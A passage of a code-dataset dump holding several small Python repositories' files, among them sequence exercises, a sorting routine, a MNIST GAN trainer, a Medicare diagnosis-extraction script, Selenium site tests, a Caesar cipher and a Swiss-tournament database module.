{}'.format(menor))","repo_name":"GabrielVictorino8266/python","sub_path":"cursoemvideo/Mundo1/exercises/ex033.py","file_name":"ex033.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71063328787","text":"# print Fibonacci series 0 1 1 2 3 5 8 13 [n = n-1 + n-2]\na = 0\nb = 1\nn = int(input(\"Enter number of terms:\"))\nprint(a,b,end = \" \")\nfor i in range(1,n-1):\n next_number = a + b\n print(next_number,end = \" \")\n a = b\n b = next_number","repo_name":"hirithik05/Python-Basics","sub_path":"Fibonacci.py","file_name":"Fibonacci.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29882024952","text":"# Let's sell Jeong Je-heon!\n# Implementation idea: count the divisors of n ** 2 that are at most n\n# Since the input does not stop the while loop on its own, terminate with a try/except block\n\n# import sys\n# input = sys.stdin.readline\n\ndef solution():\n while 1:\n data = \"\"\n try:\n data = input()\n except EOFError:\n exit(0)\n arr = list(map(int, data.split('/')))\n n = arr[1]\n cnt = 1\n for i in range(n + 1, n * 2):\n cnt += (i * n) % (i - n) == 0\n print(cnt)\nsolution()\n\n# def solution():\n# while True:\n# data = \"\"\n# try:\n# data = input()\n# except EOFError:\n# exit(0)\n# cal_num = int(data[2:])\n# answer = 0\n# for i in range(cal_num + 1, 2 * cal_num + 1):\n# answer = answer + 1 if i * cal_num % (i - cal_num) == 0 else answer\n# print(answer)\n# solution()\n\n# Understanding this algorithm\n# 1 -> 1\n# 2 -> 4 4\n# 3 -> 6 6 / 12 4\n# 4 -> 8 8 / 12 6\n# 5 -> 10 10\n# 6 -> 12 12 / 24 8\n# 7 -> 14 14\n# 8 -> 16 16 / 24 12\n\n# 3 -> 4\n# 4 -> 6\n# 6 -> 8\n# 8 -> 12\n# => the answer can be obtained with (i * n) % (i - n).","repo_name":"Minny27/Algorithm","sub_path":"BOJ/108.Math1/9273.py","file_name":"9273.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"23114439417","text":"# Tribonacci sequence\r\n\r\n# Function Return Tribonacci Sequence\r\ndef NRfunc(num):\r\n # sumlist for storing sequence\r\n sumlist = []\r\n for i in range(num):\r\n if i == 0 or i == 1 or i == 2:\r\n # sum for summing the sequence\r\n sum = 1\r\n sumlist.append(sum)\r\n else:\r\n sum = 
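
The comments above say the BOJ 9273 loop counts the divisors of n ** 2 up to n. That follows from 1/n = 1/x + 1/y: substituting x = n + d gives y = n + n*n/d, which is an integer exactly when d divides n*n. A direct cross-check of the loop against that claim:

def count_loop(n):
    cnt = 1  # the d = n case, i.e. x = y = 2n
    for i in range(n + 1, n * 2):
        cnt += (i * n) % (i - n) == 0
    return cnt

def tau_square(n):
    # naive divisor count of n^2, fine for tiny n
    return sum(1 for d in range(1, n * n + 1) if (n * n) % d == 0)

for n in (1, 2, 3, 4, 6):
    # divisors of n^2 pair up around d = n, so d <= n gives (tau + 1) // 2
    assert count_loop(n) == (tau_square(n) + 1) // 2
print("ok")
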
sumlist[i-1] + sumlist[i-2] + sumlist[i-3]\r\n sumlist.append(sum)\r\n return sumlist\r\n\r\nnum = 5\r\nNonRecursive = []\r\nif num >= 0:\r\n NonRecursive = NRfunc(num)\r\n for i in NonRecursive:\r\n print(i)\r\n if num > 2:\r\n print('Non-Recursive Tribonacci ', NonRecursive[-1] + NonRecursive[-2] + NonRecursive[-3])\r\n else:\r\n print('Non-Recursive Tribonacci ', 1)\r\nelse:\r\n print('You entered negative number')\r\n\r\n\r\n\r\n","repo_name":"shazaalqays/Tribonacci","sub_path":"Tribonacci_NonRecursive.py","file_name":"Tribonacci_NonRecursive.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43743142953","text":"def liste_fra_fil(filnavn):\n fil=open(filnavn,encoding='utf-8')\n\n fornavn=fil.readline()\n liste=[]\n\n while fornavn!='':\n liste+=[fornavn.rstrip('\\n')]\n fornavn=fil.readline()\n\n fil.close()\n return(liste)\n\n\n\ndef bubble_sort_list(liste):\n i=0\n while i !=len(liste):\n for n in range(0,(len(liste)-1)-i): #kudos til @terje for den -i'en der asså! \n if liste[n]>=liste[n+1]:\n storste_tall=liste[n]\n liste[n]=liste[n+1]\n liste[n+1]=storste_tall\n i+=1\n \n return(liste)\n \nnavneliste=liste_fra_fil('fornavn.txt')\n\nprint('Usortert navneliste',navneliste)\n\nnavneliste=bubble_sort_list(navneliste)\n\nprint('Sortert navneliste',navneliste)","repo_name":"groeterud/uni_public","sub_path":"Python/Forelesning 01022021/etterarbeid_oppg1.py","file_name":"etterarbeid_oppg1.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21746402257","text":"from django import template\n\nregister = template.Library()\n\n@register.filter(name='val_list')\ndef val_list(value, arg):\n return [getattr(x,arg) for x in value]\n\n@register.filter(name='key')\ndef key(value,arg):\n return value.get(arg)\n\n@register.filter(name='chat_other_name')\ndef chat_other_name(value, arg):\n name = None\n for user in list(value.members.all()):\n if user.user != arg:\n name = user.name\n\n return name\n\n@register.filter(name='chat_other_img')\ndef chat_other_img(value, arg):\n url = None\n for user in list(value.members.all()):\n if user.user != arg:\n url = user.profile_img_url\n\n return url","repo_name":"suryansh1411/AlumniPortal","sub_path":"alumniportal/chat/templatetags/extra_tags.py","file_name":"extra_tags.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28906399529","text":"import MNIST_GAN\nimport numpy as np\nimport timeit\nimport torch\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nimport logger\n\nCUDA = torch.cuda.is_available()\nif CUDA:\n print(\"Using GPU optimizations!\")\n\nOUTPUT_DIR = 'output'\nTRAINING_STEPS = 500000\nBATCH_SIZE = 64\nCRITIC_MODEL_DIMENSIONALITY = 64\nGENERATOR_MODEL_DIMENSIONALITY = 128\nCRITIC_UPDATES_PER_GENERATOR_UPDATE = 5\nLAMBDA = 10\nVISUALIZATION_INTERVAL = 1000\nNOISE_SAMPLE_LENGTH = 1000\nNUM_CLASSES = 10\n\n# ========== Torch Config ==========\ntorch.manual_seed(1)\nif CUDA:\n torch.cuda.manual_seed(1)\n\n# ========== DATA ==========\ndef noise(size):\n noise = torch.from_numpy(np.random.normal(0.0, size=size)).float()\n if CUDA:\n noise = noise.cuda()\n return noise\n\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n ])\nmnist_dataset = 
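
In bubble_sort_list above, the inner range stops at (len(liste) - 1) - i because each pass floats the largest remaining element to the end, so the sorted tail never needs revisiting. The same idea in compact form:

def bubble_sort(items):
    items = list(items)
    for i in range(len(items)):
        for n in range(len(items) - 1 - i):  # skip the already-sorted tail
            if items[n] > items[n + 1]:
                items[n], items[n + 1] = items[n + 1], items[n]
    return items

print(bubble_sort(["Siri", "Anna", "Per"]))  # ['Anna', 'Per', 'Siri']
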
datasets.MNIST('./data',\n\t\t\t\t\t\t\t\ttrain=True,\n\t\t\t\t\t\t\t\tdownload=True,\n\t\t\t\t\t\t\t\ttransform=transform)\nmnist_loader = torch.utils.data.DataLoader(dataset=mnist_dataset,\n\t\t\t\t\t\t\t\t\t\t\tbatch_size=BATCH_SIZE,\n\t\t\t\t\t\t\t\t\t\t\tshuffle=True,\n\t\t\t\t\t\t\t\t\t\t\tdrop_last=True)\n\ndef inf_mnist_train_gen():\n while True:\n for _, (images, labels) in enumerate(mnist_loader):\n # Convert labels to one-hot encoding:\n one_hot_labels = torch.zeros(labels.shape[0], 10)\n for (idx, label) in enumerate(labels):\n one_hot_labels[idx][label] = 1.\n\n if CUDA:\n images = images.cuda()\n one_hot_labels = one_hot_labels.cuda()\n\n yield (images, one_hot_labels)\n\nmnist = inf_mnist_train_gen()\n\n\n# ========== MODELS ==========\ngenerator = MNIST_GAN.Generator(input_size=NOISE_SAMPLE_LENGTH+NUM_CLASSES, output_size=784, dimensionality=GENERATOR_MODEL_DIMENSIONALITY, cudaEnabled=CUDA)\ncritic = MNIST_GAN.Critic(dimensionality=CRITIC_MODEL_DIMENSIONALITY, num_classes=NUM_CLASSES, cudaEnabled=CUDA)\n\n# ========= TRAINING =========\nlogger = logger.Logger(OUTPUT_DIR)\nrunning_critic_loss = 0.0\nrunning_generator_loss = 0.0\nrunning_batch_start_time = timeit.default_timer()\n\nfor training_step in range(1, TRAINING_STEPS+1):\n print(\"BATCH: [{0}/{1}]\\r\".format(training_step % VISUALIZATION_INTERVAL, VISUALIZATION_INTERVAL), end='')\n\n # Critic\n for critic_step in range(CRITIC_UPDATES_PER_GENERATOR_UPDATE):\n images, labels = next(mnist)\n images = Variable(images)\n\n noise_sample = noise(size=(BATCH_SIZE, NOISE_SAMPLE_LENGTH))\n conditioned_noise_sample = Variable(torch.cat((noise_sample, labels), 1))\n if CUDA:\n conditioned_noise_sample = conditioned_noise_sample.cuda()\n\n fake_images = generator(conditioned_noise_sample)\n critic_loss = critic.train(images, fake_images, labels, LAMBDA)\n running_critic_loss += critic_loss.data[0]\n\n # Generator\n noise_sample = noise(size=(BATCH_SIZE, NOISE_SAMPLE_LENGTH))\n conditioned_noise_sample = Variable(torch.cat((noise_sample, labels), 1))\n if CUDA:\n conditioned_noise_sample = conditioned_noise_sample.cuda()\n\n fake_images = generator(conditioned_noise_sample)\n critic_output = critic(fake_images, labels)\n generator_loss = generator.train(critic_output)\n running_generator_loss += generator_loss.data[0]\n\n # Visualization\n if training_step % VISUALIZATION_INTERVAL == 0:\n # Timing\n running_batch_elapsed_time = timeit.default_timer() - running_batch_start_time\n running_batch_start_time = timeit.default_timer()\n logger.log_training_step(training_step, TRAINING_STEPS, running_batch_elapsed_time, running_critic_loss, running_generator_loss)\n\n # Save model weights\n logger.save_model_weights(generator, critic)\n\n # Visualization\n vis_one_hot_labels = torch.zeros(10, 10)\n if CUDA:\n vis_one_hot_labels = vis_one_hot_labels.cuda()\n for label in range(10):\n vis_one_hot_labels[label][label] = 1\n vis_noise_sample = noise(size=(10, NOISE_SAMPLE_LENGTH))\n vis_conditioned_noise_sample = Variable(torch.cat((vis_noise_sample, vis_one_hot_labels), 1))\n if CUDA:\n vis_conditioned_noise_sample = vis_conditioned_noise_sample.cuda()\n\n vis_fake_images = generator(vis_conditioned_noise_sample)\n\n logger.visualize_generated_data(images, vis_fake_images, training_step)\n running_critic_loss = 0.0\n running_generator_loss = 
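
The per-element one-hot loop in inf_mnist_train_gen above can also be written with scatter_, which fills the same tensor in one call:

import torch

labels = torch.tensor([3, 0, 9])
one_hot = torch.zeros(labels.shape[0], 10)
# place a 1.0 along dim 1 at each label's column index
one_hot.scatter_(1, labels.unsqueeze(1), 1.0)
print(int(one_hot[0, 3]), int(one_hot[1, 0]), int(one_hot[2, 9]))  # 1 1 1
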
0.0\n","repo_name":"BlissChapman/ICW-MNIST-GAN","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"22395572034","text":"## EXTRACT ALL DIAGNOSIS CODES FOR EACH PATIENT WITHIN A YEAR OF HOSPITALIZATION FOT CALCULATING COMORBIDITY SCORE\nimport pandas as pd\nimport dask.dataframe as dd\nimport dask\nimport numpy as np\nimport datetime\n\npd.set_option('display.max_columns', 500)\nfrom dask.distributed import Client\nclient = Client(\"10.50.86.250:35086\")\n\nmedparPath = \"/gpfs/data/cms-share/data/medicare/{}/medpar/parquet/\"\nslPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/medpar_mds/CDISCHRG_SL/'\nwritePath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/medpar_mds/'\nanalysisPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/medpar/infection/initial_analysis/'\ntestPath = '/gpfs/data/cms-share/duas/55378/Zoey/gardner/data/merge_output/infection/test/'\n\nyears = range(2011, 2018)\nclaims_type = [\"primary\", \"secondary\"]\noutcome = [\"UTI\", \"PNEU\"]\n\ndef get_diagnosis(analysisDF, medpar, intermediate_output_path=None, output_path=None):\n ## drop diagnosis columns in analytical sample data\n dx_cols = ['DGNS_{}_CD'.format(i) for i in range(1, 26)]\n analysisDF = analysisDF.drop(columns=dx_cols)\n ## merge analytical sample with raw medpar data\n merge = analysisDF.merge(medpar, on='BENE_ID', how='left', suffixes=['', '_comorb'])\n ## keep raw medpar data with admission dates within 1 year before the admission date on hospital infection claims\n merge1year = merge[(merge['ADMSN_DT']>=merge['ADMSN_DT_comorb']) &\n ((merge['ADMSN_DT'] - merge['ADMSN_DT_comorb']).dt.days <=365)]\n\n ## separate icd 10 and icd 9 claims (useful for 2015 data)\n merge_icd9 = merge1year[merge1year['ADMSN_DT_comorb'] < datetime.datetime(2015, 10, 1)]\n merge_icd10 = merge1year[merge1year['ADMSN_DT_comorb'] >= datetime.datetime(2015, 10, 1)]\n ## reshape data from wide to long: for each hospital infection claim, there are multiple rows of diagnosis code\n dx_icd9 = merge_icd9[['MEDPAR_ID'] + dx_cols].\\\n melt(id_vars='MEDPAR_ID', value_vars=dx_cols, var_name='n', value_name='DX')\n ## create an indicator to indicate ICD-9-CM vs ICD-10-CM coding system\n dx_icd9['Dx_CodeType'] = \"09\"\n dx_icd10 = merge_icd10[['MEDPAR_ID'] + dx_cols].\\\n melt(id_vars='MEDPAR_ID', value_vars=dx_cols, var_name='n', value_name='DX')\n dx_icd10['Dx_CodeType'] = \"10\"\n ## concat icd9 and icd10\n dx = dd.concat([dx_icd9, dx_icd10])\n dx = dx.rename(columns={\"MEDPAR_ID\": \"patid\"})\n\n dx.to_parquet(output_path)\n\n\nprimary_dx_all = []\nsecondary_dx_all = []\nfor year in years:\n\n ## read in raw medpar data for current year and the prior year\n use_cols = ['BENE_ID', 'ADMSN_DT'] + ['DGNS_{}_CD'.format(i) for i in range(1, 26)]\n medpar_year = dd.read_parquet(medparPath.format(year))\n medpar_prior = dd.read_parquet(medparPath.format(year - 1))\n ## concat two years of medpar data\n if year==2011:\n medpar_year = medpar_year.reset_index()\n medpar = dd.concat([medpar_year, medpar_prior])\n\n if year==2017:\n medpar_prior = medpar_prior.reset_index()\n medpar = dd.concat([medpar_year, medpar_prior])\n\n if year in range(2012, 2017):\n medpar = dd.concat([medpar_year, medpar_prior])\n medpar = medpar.reset_index()\n ## subset to only useful columns\n medpar = medpar[use_cols]\n medpar = medpar.astype({'ADMSN_DT': 
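
The wide-to-long reshape inside get_diagnosis above (25 DGNS_*_CD columns into a single DX column) is a plain melt; the same step on a two-column toy frame:

import pandas as pd

df = pd.DataFrame({"MEDPAR_ID": ["A"], "DGNS_1_CD": ["N390"], "DGNS_2_CD": ["J189"]})
long = df.melt(id_vars="MEDPAR_ID", value_vars=["DGNS_1_CD", "DGNS_2_CD"],
               var_name="n", value_name="DX")
print(long)  # one row per (claim, diagnosis-slot) pair
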
'datetime64[ns]'})\n\n ## read in hospital infection claims sample\n primary = dd.read_parquet(slPath + \"{0}{1}/{2}\".format(\"primary\", \"UTI\", year))\n secondary = dd.read_parquet(slPath + \"{0}{1}/{2}\".format(\"secondary\", \"UTI\", year))\n ## apply the function to select all diagnosis codes from hospital claims within a year of hospitalization\n get_diagnosis(primary, medpar,\n output_path=writePath + \"DX/{0}{1}/{2}\".format(\"primary\", \"UTI\", year))\n get_diagnosis(secondary, medpar,\n output_path=writePath + \"DX/{0}{1}/{2}\".format(\"secondary\", \"UTI\", year))\n ## read the diagnosis data back\n primary_dx = dd.read_parquet(\n writePath + \"DX/{0}{1}/{2}\".format(\"primary\", \"UTI\", year)\n )\n secondary_dx = dd.read_parquet(\n writePath + \"DX/{0}{1}/{2}\".format(\"secondary\", \"UTI\", year)\n )\n ## remove missing diagnosis code and keep only unique diagnosis code for each claim\n primary_dx = primary_dx[~primary_dx['DX'].isna()]\n primary_dx_unique = primary_dx[['patid', 'DX', 'Dx_CodeType']].drop_duplicates()\n secondary_dx = secondary_dx[~secondary_dx['DX'].isna()]\n secondary_dx_unique = secondary_dx[['patid', 'DX', 'Dx_CodeType']].drop_duplicates()\n ## convert parquet file to csv\n primary_dx_df = primary_dx_unique.compute()\n secondary_dx_df = secondary_dx_unique.compute()\n primary_dx_df.to_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"primary\", \"UTI\", year), index=False)\n secondary_dx_df.to_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"secondary\", \"UTI\", year), index=False)\n ## append years of diagnosis code to a list\n primary_dx_all.append(pd.read_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"primary\", \"UTI\", year), low_memory=False))\n secondary_dx_all.append(pd.read_csv(writePath + \"DX/{0}{1}{2}.csv\".format(\"secondary\", \"UTI\", year), low_memory=False))\nprimary_dx_all_df = pd.concat(primary_dx_all)\nsecondary_dx_all_df = pd.concat(secondary_dx_all)\nprimary_dx_all_df = primary_dx_all_df.sort_values(by='patid')\nsecondary_dx_all_df = secondary_dx_all_df.sort_values(by='patid')\n## write all years of data to csv\nprimary_dx_all_df.to_csv(writePath + \"DX/{0}{1}.csv\".format(\"primary\", \"UTI\"), index=False)\nsecondary_dx_all_df.to_csv(writePath + \"DX/{0}{1}.csv\".format(\"secondary\", \"UTI\"), index=False)\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"sanghavi-lab/nhc_infections","sub_path":"7_get_comorb_claims.py","file_name":"7_get_comorb_claims.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31589720263","text":"import pytest\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\n\r\n@pytest.fixture(autouse=True)\r\ndef testing():\r\n pytest.driver = webdriver.Chrome(r'C:\\Users\\HP\\PycharmProjects\\chromedriver.exe')\r\n pytest.driver.get('https://petfriends1.herokuapp.com/login')\r\n yield\r\n pytest.driver.quit()\r\n\r\n\r\ndef test_all_pets():\r\n pytest.driver.implicitly_wait(10)\r\n pytest.driver.find_element_by_id('email').send_keys('marinatest@1secmail.com')\r\n pytest.driver.find_element_by_id('pass').send_keys('testtest')\r\n pytest.driver.find_element_by_css_selector('button[type=\"submit\"]').click()\r\n assert pytest.driver.find_element_by_tag_name('h1').text == 'PetFriends'\r\n\r\n images = pytest.driver.find_elements_by_css_selector('.card-deck 
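
The autouse fixture at the top of the Selenium tests above is the standard pytest setup/teardown shape: code before yield runs before every test, code after it runs afterwards, even when the test fails. A browser-free sketch of the pattern:

import pytest

@pytest.fixture(autouse=True)
def resource():
    state = {"open": True}  # setup
    yield state
    state["open"] = False   # teardown

def test_uses_resource(resource):
    assert resource["open"]
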
.card-img-top')\r\n names = pytest.driver.find_elements_by_css_selector('.card-deck .card-title')\r\n descriptions = pytest.driver.find_elements_by_css_selector('.card-deck .card-text')\r\n\r\n for i in range(len(names)):\r\n assert images[i].get_attribute('src') != '', 'There is pet without photo'\r\n assert names[i].text == '', 'There is pet without name'\r\n assert descriptions[i].text != '', 'There is pet without type and age'\r\n assert ',' in descriptions[i].text\r\n parts = descriptions[i].text.split(',')\r\n assert len(parts[0]) > 0, 'There is pet without type'\r\n assert len(parts[1]) > 0, 'There is pet without age'\r\n\r\n\r\ndef test_show_my_pets():\r\n pytest.driver.find_element_by_id('email').send_keys('marinatest@1secmail.com')\r\n pytest.driver.find_element_by_id('pass').send_keys('testtest')\r\n pytest.driver.find_element_by_css_selector('button[type=\"submit\"]').click()\r\n pytest.driver.find_element_by_link_text(u'Мои питомцы').click()\r\n\r\n WebDriverWait(pytest.driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '.\\\\.col-sm-4.left')))\r\n stat = pytest.driver.find_elements_by_css_selector('.\\\\.col-sm-4.left')\r\n count = stat[0].text.split('\\n')\r\n count = count[1].split(' ')\r\n count = int(count[1])\r\n\r\n WebDriverWait(pytest.driver, 10).until(EC.presence_of_element_located((By.ID, 'all_my_pets')))\r\n images = pytest.driver.find_elements_by_css_selector('.table.table-hover img')\r\n pets = pytest.driver.find_elements_by_css_selector('.table.table-hover tbody tr td')\r\n # проверяем, что кол-во питомцев совпадает с данными статистики\r\n assert len(pets) == count * 4\r\n\r\n s = 0\r\n names = []\r\n an_types = []\r\n ages = []\r\n\r\n for i in range(count):\r\n if images[i].get_attribute('src') == '':\r\n s += 1\r\n name = pets[i*4]\r\n an_type = pets[i*4+1]\r\n age = pets[i*4+2]\r\n names.append(name.text)\r\n an_types.append(an_type.text)\r\n ages.append(age.text)\r\n # проверяем, что у всех питомцев есть имя, вид, возраст\r\n assert name.text != '', 'There is pet without name'\r\n assert an_type.text != '', 'There is pet without type'\r\n assert age.text != '', 'There is pet without age'\r\n\r\n # проверяем, что питомцев без фото не больше половины\r\n assert s <= count//2, \"More than a half of pets have no photo\"\r\n\r\n # проверяем, что нет одинаковых имен\r\n names_set = set(names)\r\n assert len(names_set) == count, 'There are some pets with the same names'\r\n\r\n # проверяем, что нет одинаковых питомцев\r\n same_pets = False\r\n if len(names_set) < count:\r\n for i in range(len(names)-1):\r\n for j in range(i+1, len(names)):\r\n if (names[i] == names[j]) and (an_types[i] == an_types[j]) and (ages[i] == ages[j]):\r\n same_pets = True\r\n assert same_pets is False, 'There are the same pets'\r\n","repo_name":"MarinaKartina/Marina-s-workspace","sub_path":"test_selenium_petfriends.py","file_name":"test_selenium_petfriends.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42634106998","text":"from base64 import encode\nimport string\ndef ceaserCipher(s, k):\n d = {}\n alp = string.ascii_lowercase\n for i , ele in enumerate(alp):\n d[ele] = alp[(i + k) % 26]\n\n\n ecoded = ''\n for j in s:\n if j.isalpha():\n if j.isupper():\n ecoded += d[j].upper()\n else:\n ecoded += d[j]\n \n\n else:\n ecoded += j\n return ecoded\n # return d\n \n \n \n\n \n\n\n\ns = input('messege: ')\nk = int(input('key: '))\nprint(ceaserCipher(s, 
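
The shift table that ceaserCipher builds above can also come from str.maketrans, which translates a whole lowercase string in one call (uppercase handling is omitted in this sketch):

import string

k = 3
alp = string.ascii_lowercase
table = str.maketrans(alp, alp[k:] + alp[:k])
print("attack at dawn".translate(table))  # -> dwwdfn dw gdzq
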
k))","repo_name":"Samkanja/solutions","sub_path":"string/ceaserCipher.py","file_name":"ceaserCipher.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42782869521","text":"#!/usr/bin/env python\n#\n# tournament.py -- implementation of a Swiss-system tournament\n#\n\nimport psycopg2\n\n# To prevent injection attacks in new player registration.\nimport bleach\n\n\ndef connect():\n \"\"\"Connect to the PostgreSQL database. Returns a database connection.\"\"\"\n return psycopg2.connect(\"dbname=tournament\")\n\n\ndef deleteMatches():\n \"\"\"Delete matches from the database.\"\"\"\n # Standard connection procedure.\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('DELETE FROM matches')\n\n # Standard closing procedure.\n c.commit()\n c.close()\n\n\ndef deletePlayers():\n \"\"\"Delete players from the database.\"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('DELETE FROM players')\n\n c.commit()\n c.close()\n\n\ndef countPlayers():\n \"\"\"Returns number of players in the database.\"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute('SELECT COUNT(*) FROM players')\n\n count = cursor.fetchone()[0]\n\n c.commit()\n c.close()\n\n return count\n\n\ndef registerPlayer(name):\n \"\"\"Delete players from the database.\"\"\"\n\n # Cleaning the passed name just in case.\n clean_name = bleach.clean(name, strip=True)\n\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\n \"INSERT INTO players (player_name) VALUES (%s)\", (clean_name,))\n\n c.commit()\n c.close()\n\n\ndef playerStandings():\n \"\"\"Returns a list of the players and their win records, sorted by wins.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won\n matches: the number of matches the player has played\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\"SELECT * FROM results\")\n\n results = cursor.fetchall()\n return_val = []\n for result in results:\n # int() is required because an L is appended to each integer in the\n # results that are returned unless the number is converted.\n return_val.append(\n [result[0], result[1], int(result[2]), int(result[3])])\n\n c.close()\n\n return return_val\n\n\ndef reportMatch(winner, loser):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won\n loser: the id number of the player who lost\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n cursor.execute(\n \"INSERT INTO matches (winner_id, loser_id) VALUES (%s, %s)\", (winner, loser,))\n\n c.commit()\n c.close()\n\n\ndef swissPairings():\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. 
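
swissPairings, continued below, reduces to walking the standings two at a time; the pairing step alone, run on made-up (id, name, wins, matches) tuples:

ranking = [(1, "Ada", 2, 2), (2, "Bey", 2, 2), (3, "Cal", 1, 2), (4, "Dee", 0, 2)]
pairs = []
while len(ranking) > 1:
    a = ranking.pop(0)
    b = ranking.pop(0)
    pairs.append((a[0], a[1], b[0], b[1]))
print(pairs)  # [(1, 'Ada', 2, 'Bey'), (3, 'Cal', 4, 'Dee')]
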
Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id\n name2: the second player's name\n \"\"\"\n c = connect()\n cursor = c.cursor()\n\n # Grab the rankings through the playerStandings function.\n ranking = playerStandings()\n\n c.close()\n\n pairs = []\n\n # Because the results view already sorts players by how many wins they have,\n # all we need to do here is drill down the list.\n while len(ranking) > 1:\n player_a = ranking.pop(0)\n player_b = ranking.pop(0)\n pairs.append((player_a[0], player_a[1], player_b[0], player_b[1]))\n\n return pairs\n","repo_name":"dwellsdev/fullstack-nanodegree-tournament","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"877928326","text":"from sklearn.datasets import make_blobs\nimport numpy as np\nimport random\n\n\ndef make_shirts(count=500):\n def did_shirt_sell(hasPhoto, hasModel, price, reviewCount, reviewAverageLength, isAdvertised, isListedForSale):\n p = 0.2\n if hasModel:\n p = np.mean([p, 0.4])\n elif hasPhoto:\n p = np.mean([p, 0.3])\n if isAdvertised:\n p = np.mean([p, 0.6])\n if isListedForSale:\n p = np.mean([p, 0.5])\n if reviewCount < 5:\n p = np.mean([p, 0.1])\n price = min(30, price)\n price = max(5, price)\n p = np.mean([p, -0.04 * price + 1])\n p = np.mean([p, 0.6 / (1 + np.exp(-3 + 2))])\n return np.random.binomial(1, p)\n data = np.array([(\n random.choice([1, 0]),\n random.choice([1, 0]),\n random.gauss(15, 5),\n random.randint(0, 100),\n random.randint(10, 5000),\n random.choice([1, 0]),\n random.choice([1, 0]),\n ) for x in xrange(count)])\n target = np.array([did_shirt_sell(*x) for x in data])\n return type('Dataset', (object,), dict(\n data=data,\n target=target,\n feature_names=[\n 'hasPhoto',\n 'hasModel',\n 'price',\n 'reviewCount',\n 'reviewAverageLength',\n 'isAdvertised',\n 'isListedForSale',\n ]))\n\n\ndef make_users(teenCount=250, twentyCount=500, thirtyCount=150, fortyCount=100):\n def make_user(meanAge, commonDevice):\n age = random.gauss(meanAge, 3)\n gender = random.choice(xrange(2))\n if np.random.binomial(1, 0.8):\n device = commonDevice\n else:\n otherDevices = list(set(xrange(5)) - set([commonDevice]))\n device = random.choice(otherDevices)\n return age, gender, device\n data = []\n target = []\n for x in xrange(teenCount):\n data.append(make_user(meanAge=15, commonDevice=4))\n for x in xrange(twentyCount):\n data.append(make_user(meanAge=25, commonDevice=3))\n for x in xrange(thirtyCount):\n data.append(make_user(meanAge=35, commonDevice=1))\n for x in xrange(fortyCount):\n data.append(make_user(meanAge=45, commonDevice=0))\n userCount = teenCount + twentyCount + thirtyCount + fortyCount\n locations = make_blobs(n_samples=userCount, n_features=2, centers=3)[0]\n data = np.c_[\n np.array(data),\n np.array(locations)]\n return type('Dataset', (object,), dict(\n data=data,\n feature_names=[\n 'age',\n 'gender',\n 'device',\n 'x',\n 'y',\n ]))\n\n\ndef make_logs(inlierCount=1000, outlierCount=0):\n # Make normal data\n locations = make_blobs(n_samples=inlierCount, n_features=2, centers=3)[0]\n weekdays = [random.choice([1, 2, 3, 4, 5]) for x in xrange(inlierCount)]\n times = 
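
make_shirts above blends feature effects by repeatedly averaging probabilities and then draws a Bernoulli outcome; the arithmetic for one hypothetical shirt:

import numpy as np

p = 0.2
p = np.mean([p, 0.4])  # hasModel     -> 0.30
p = np.mean([p, 0.6])  # isAdvertised -> 0.45
sold = np.random.binomial(1, p)
print(round(float(p), 2), sold in (0, 1))  # 0.45 True
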
